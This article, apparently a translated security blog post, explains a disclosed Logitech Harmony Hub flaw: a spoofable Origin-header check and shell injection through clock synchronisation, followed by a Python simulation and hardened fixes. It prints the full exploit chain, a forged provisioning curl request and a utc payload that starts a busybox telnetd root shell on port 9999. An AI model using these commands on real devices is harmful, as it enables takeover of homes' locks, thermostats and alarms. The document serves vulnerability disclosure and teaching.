How to control all smart home devices through Logitech's Harmony Hub
Introduction
Logitech's Harmony Hub is a popular smart home controller that communicates with and controls the networked devices in your home. Millions of people worldwide use it, and it supports 270,000 devices from 6,000 brands. Tenable recently published details of a critical vulnerability in the product that lets a remote attacker take control of the Hub, and of the devices behind it, without authorization.
The Hub is well regarded for its scripting and automation capabilities. As smart homes become mainstream, a capable central controller matters more and more. Amazon (Alexa), Google (Home), Apple (HomeKit) and Logitech (Harmony) all offer products of this kind, and Logitech's Harmony is a solid choice among them.
However, centralized control of the smart home also attracts attackers. If the control point can be captured, every device connected to the controller can be accessed illegitimately: smart locks, TVs, thermostats and even smart refrigerators end up under a remote attacker's control.
Exploration
The Hub exposes three open ports, running XMPP, WebSocket and a custom Web API service. All three services are implemented in Lua.
The firmware can be captured during a device update. It contains a Linux kernel and a SquashFS file system holding the application code: compiled Lua files that implement the Hub's services and functions. They can be decompiled with a patched version of the luadec project from GitHub.
These Lua files implement all of the Harmony Hub's operating logic and its smart home features. The Hub uses a messaging system: when a user controls the Hub from the app, Logitech's remote server sends the Hub commands to carry out. There is, of course, a protection mechanism intended to ensure that only trusted servers can issue requests. That mechanism is flawed, and any remote attacker can bypass it.
The vulnerability
The Hub handles network requests from remote hosts, and it does verify the source before processing a request. In principle that is fine; in practice the check relies on a header that the sender controls, so an attacker only needs to add one line to the HTTP request headers to fake the source. From then on any remote attacker can bypass the check and make the Hub do whatever they want.
The Hub also has a clock synchronization feature. It accepts input from what it believes is a trusted server and then runs a command in the Linux shell to set the clock. Note that this input is never checked before it is used.
Exploitation
So far, we have two things to do:
Inject commands through the clock synchronization feature
Bypass the source verification
To do this, we first send an HTTP request that points the Hub's clock synchronization server setting at a server the attacker controls. The Hub then contacts the newly configured server to resynchronize its clock, and the attacker's server answers with the injected command.
curl -d "{'cmd':'setup.account?provision', 'params': { 'provisionInfo': { 'mode':3, 'authToken':'1', 'discoveryServer':'http://10.0.0.10'} }}" -H "Origin: .myharmony.com" -H "Content-Type: application/json" http://10.0.0.176:8088
Forged provisioning request that points the device at an attacker-controlled discovery server
{"DiscoveryUrls": [{ "Identifier":"TimeServer/current", "Address":"http://10.0.0.10/TimeServer/current" }]}
Response to the device's discovery request, directing it to the attacker's clock synchronization server
{"utc":"0\";/bin/busybox telnetd -l/bin/sh -p9999;date -s \"0"}
Response from the attacker-controlled clock synchronization server; the utc value closes the quoted argument of the date command and starts a telnet shell on port 9999
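To make the two defects concrete, here is an added example that is not Logitech firmware and not Tenable's code: a stand-alone simulation of the chain above, from discovery response to the command the shell would run, with the vulnerable pattern beside a hardened one. It assumes the Hub pastes the server-supplied utc string into `date -s "<utc>"` and hands that line to a shell, and that the flawed source check trusts the domain suffix of the Origin header; the accepted timestamp format and the token header name in the hardened variant are this example's own choices.

```python
"""Simulation of the Harmony Hub clock-synchronisation chain (added example).
Assumed, not taken from the firmware: the Hub runs `date -s "<utc>"` via a
shell, and the source check trusts the Origin header's domain suffix."""
import hmac
import json
import re
import shlex
from datetime import datetime
from typing import Callable, Dict, List

DISCOVERY = "http://10.0.0.10"   # attacker-controlled server from the page
PAYLOAD = '0";/bin/busybox telnetd -l/bin/sh -p9999;date -s "0'   # utc value from the page


def make_fetch(utc_value: str) -> Callable[[str], str]:
    """In-memory stand-in for HTTP GET against the discovery/time server.
    Constructed responses, shaped like the exchange shown on the page."""
    responses: Dict[str, str] = {
        DISCOVERY + "/": json.dumps({"DiscoveryUrls": [
            {"Identifier": "TimeServer/current",
             "Address": DISCOVERY + "/TimeServer/current"}]}),
        DISCOVERY + "/TimeServer/current": json.dumps({"utc": utc_value}),
    }
    return lambda url: responses[url]


def resolve_time_server(discovery_server: str, fetch: Callable[[str], str]) -> str:
    """Step 1 of the chain: the discovery server says where the time server is."""
    doc = json.loads(fetch(discovery_server.rstrip("/") + "/"))
    for entry in doc["DiscoveryUrls"]:
        if entry["Identifier"] == "TimeServer/current":
            return entry["Address"]
    raise LookupError("no TimeServer/current entry in discovery response")


def shell_commands(cmdline: str) -> List[List[str]]:
    """Tokenise a command line the way a POSIX shell would and split it at ';'
    so we can see how many separate commands the shell would actually run."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands: List[List[str]] = [[]]
    for token in lexer:
        if token == ";":
            commands.append([])
        else:
            commands[-1].append(token)
    return [c for c in commands if c]


def sync_clock_vulnerable(fetch: Callable[[str], str]) -> List[List[str]]:
    """Assumed vulnerable pattern: the server-supplied string is pasted into a
    shell command line. Returns the commands the shell would execute; the real
    firmware would hand the string to the shell here, we only tokenise it."""
    utc = json.loads(fetch(resolve_time_server(DISCOVERY, fetch)))["utc"]
    cmdline = 'date -s "%s"' % utc          # a '"' in utc ends the argument, ';' starts a new command
    return shell_commands(cmdline)


UTC_RE = re.compile(r"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z")   # our assumed wire format


def sync_clock_hardened(fetch: Callable[[str], str]) -> List[str]:
    """Hardened version: validate the timestamp strictly and build an argv list
    for an execve-style call, so no shell ever sees the server's bytes.
    Raises ValueError on anything that is not a well-formed timestamp."""
    utc = json.loads(fetch(resolve_time_server(DISCOVERY, fetch)))["utc"]
    if not isinstance(utc, str) or not UTC_RE.fullmatch(utc):
        raise ValueError("rejected time-server response: %r" % utc)
    parsed = datetime.strptime(utc, "%Y-%m-%dT%H:%M:%SZ")   # also rejects month 13, day 40, ...
    return ["date", "-s", parsed.strftime("%Y-%m-%d %H:%M:%S")]


def origin_trusted_vulnerable(headers: Dict[str, str]) -> bool:
    """Assumed shape of the flawed source check: believe the client-supplied
    Origin header if it ends in the vendor's domain. curl can set it to anything."""
    return headers.get("Origin", "").endswith("myharmony.com")


def origin_trusted_hardened(headers: Dict[str, str], expected_token: str) -> bool:
    """Origin is attacker-controlled and proves nothing. Require a secret the
    remote end must actually hold (hypothetical per-device token header),
    compared in constant time."""
    return hmac.compare_digest(headers.get("X-Harmony-Token", ""), expected_token)


if __name__ == "__main__":
    print("vulnerable shell would run:", sync_clock_vulnerable(make_fetch(PAYLOAD)))
    try:
        sync_clock_hardened(make_fetch(PAYLOAD))
    except ValueError as exc:
        print("hardened:", exc)
    print("hardened argv:", sync_clock_hardened(make_fetch("2018-04-25T12:00:00Z")))
```

Running it shows the page's payload turning one `date -s` into three shell commands, the middle one being `/bin/busybox telnetd -l/bin/sh -p9999`, while the hardened path rejects the same response outright and, for a well-formed timestamp, produces an argv list that never passes through a shell. The source check is the same lesson in a different place: a header the client writes cannot authenticate the client.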
In practice
Once the device is fully compromised, a remote attacker can reach every smart device connected to the Hub: change the settings of a Nest thermostat, disable the sensors of a home security system, or open a door latch, as shown below.
(Screenshot: https://cdn-images-1.medium.com/max/800/0*cPsJsU09oa_G_NFJ)
Hub-style hardware will always be a prime target for attackers, because compromising one product yields control of every device connected to it. Such hubs should therefore be held to a higher security standard than the devices they control, and be made correspondingly harder to attack.